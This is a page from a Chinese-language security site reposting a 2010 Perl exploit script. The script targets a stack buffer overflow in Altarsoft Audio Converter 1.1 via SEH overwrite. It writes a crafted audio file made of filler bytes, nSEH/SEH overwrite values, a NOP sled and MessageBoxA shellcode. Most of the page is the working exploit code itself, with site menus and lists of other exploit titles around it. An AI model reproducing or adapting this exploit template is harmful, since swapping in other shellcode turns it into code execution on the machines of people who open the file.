首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Altarsoft Audio Converter 1.1 Buffer Overflow Exploit (SEH)
来源:http://www.invasao.com.br 作者:G0M3S 发布时间:2010-12-17  

#
#
# Exploit Title: Exploit Buffer Overflow Altarsoft Audio Converter 1.1(SEH)
# Date: 16/12/2010
# Author: C4SS!0 G0M3S
# Software Link: http://www.altarsoft.com/downloads/AltarsoftAudioConverter.exe
# Version: 111
# Tested on: WIN-XP SP3 PT-BR
# CVE: N/A
#
#
#Created By C4SS!0 G0M3S
#E-MAIL Louredo_@hotmail.com
#Home: http://www.invasao.com.br
#
#
use IO::File;

if($#ARGV != 0)
{
sub usage
{
system("cls");
system("color 4f");

      print "\r\n   ||=================================================================||\n";
   print "   ||                                                                 ||\n";
      print "   || Exploit Buffer Overflow Altarsoft Audio Converter 1.1(SEH)      ||\n";
      print "   || Created BY C4SS!0 G0M3S                                         ||\n";
      print "   || Contact Louredo_\@hotmail.com                                    ||\n";
   print "   ||                                                                 ||\n";
      print "   ||=================================================================||\n\n\n";
print("[+]Exploit: Buffer Overflow Altarsoft Audio Converter 1.1(SEH)\n");
print("[+]Date: 16/12/2010\n");
print("[+]Author: C4SS!0 G0M3S\n");
print("[+]E-mail: Louredo_\@hotmail.com\n");
print("[+]Home: http://www.invasao.com.br\n");
print("[+]Version: 2.1\n");
print("[+]Impact: Hich\n");
print("[+]Tested On: WIN-XP SP3 Virtual Box\n\n");

}
usage;
print "[-]Usage: $0 <File Name>\n";
print "[-]Exemple: $0 music.wav\n";
exit(0);
}

$file = $ARGV[0];

$buffer = "\x41" x 4128;
$eip = pack('V',0x004FCA3F);
$nseh = "\xeb\x06\x90\x90";
$seh =  pack('V',0x0042f486);

$nops = "\x90" x 15;

#Shellcode MessageBoxA()
my $shellcode =
"\x33\xC0\x33\xC9\x33\xD2\x33\xDB\x50\x68\x6C\x6C\x20\x20\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x54\x58\xBB\x7B\x1D\x80\x7C\x50".
"\xFF\xD3\x90\x33\xD2\x52\xB9\x5E\x67\x30\xEF\x81\xC1\x11\x11\x11\x11\x51\x68\x61\x67\x65\x42\x68\x4D\x65\x73\x73\x54\x5A\x52\x50".
"\xB9\x30\xAE\x80\x7C\xFF\xD1\x33\xC9\x33\xD2\x33\xDB\x51\x68\x53\x20\x20\x20\x68\x47\x30\x4D\x33\x68\x53\x21\x30\x20\x68\x20\x43".
"\x34\x53\x68\x64\x20\x42\x79\x68\x6F\x69\x74\x65\x68\x45\x78\x70\x6C\x54\x59\x53\x68\x21\x30\x20\x20\x68\x43\x34\x53\x53\x54\x5B".
"\x6A\x40\x53\x51\x52\xFF\xD0\x33\xC0\x50\xBE\xFA\xCA\x81\x7C\xFF\xD6";

 

$payload = $buffer.$eip.$nseh.$seh.$nops.$shellcode;

open(f,">$file")or die "ERROR:\n$!\n";
print f $payload;
close(f);
usage;
print "[*]Identifying the size Shellcode\n";
print "[*]The Shellcode Size:".length($shellcode)."\n";
print "[*]Creating File $file\n";
print "[*]The File $file Created Successfully\n";
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SolarFTP 2.0 Multiple Commands
·Aesop GIF Creator <= v2.1 (.ae
·Internet Explorer 8 CSS Parser
·D-Link DIR-300 CSRF Vuln (Chan
·Easy DVD Creator Local Crash P
·Windows Win32k Pointer Derefer
·Digital Audio Editor 7.6.0.237
·AhnLab V3 Internet Security 8.
·Google Urchin 5.7.03 LFI Vulne
·NProtect Anti-Virus 2007 <= 20
·IBM Tivoli Storage Manager (TS
·ESTsoft ALYac Anti-Virus 1.5 <
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved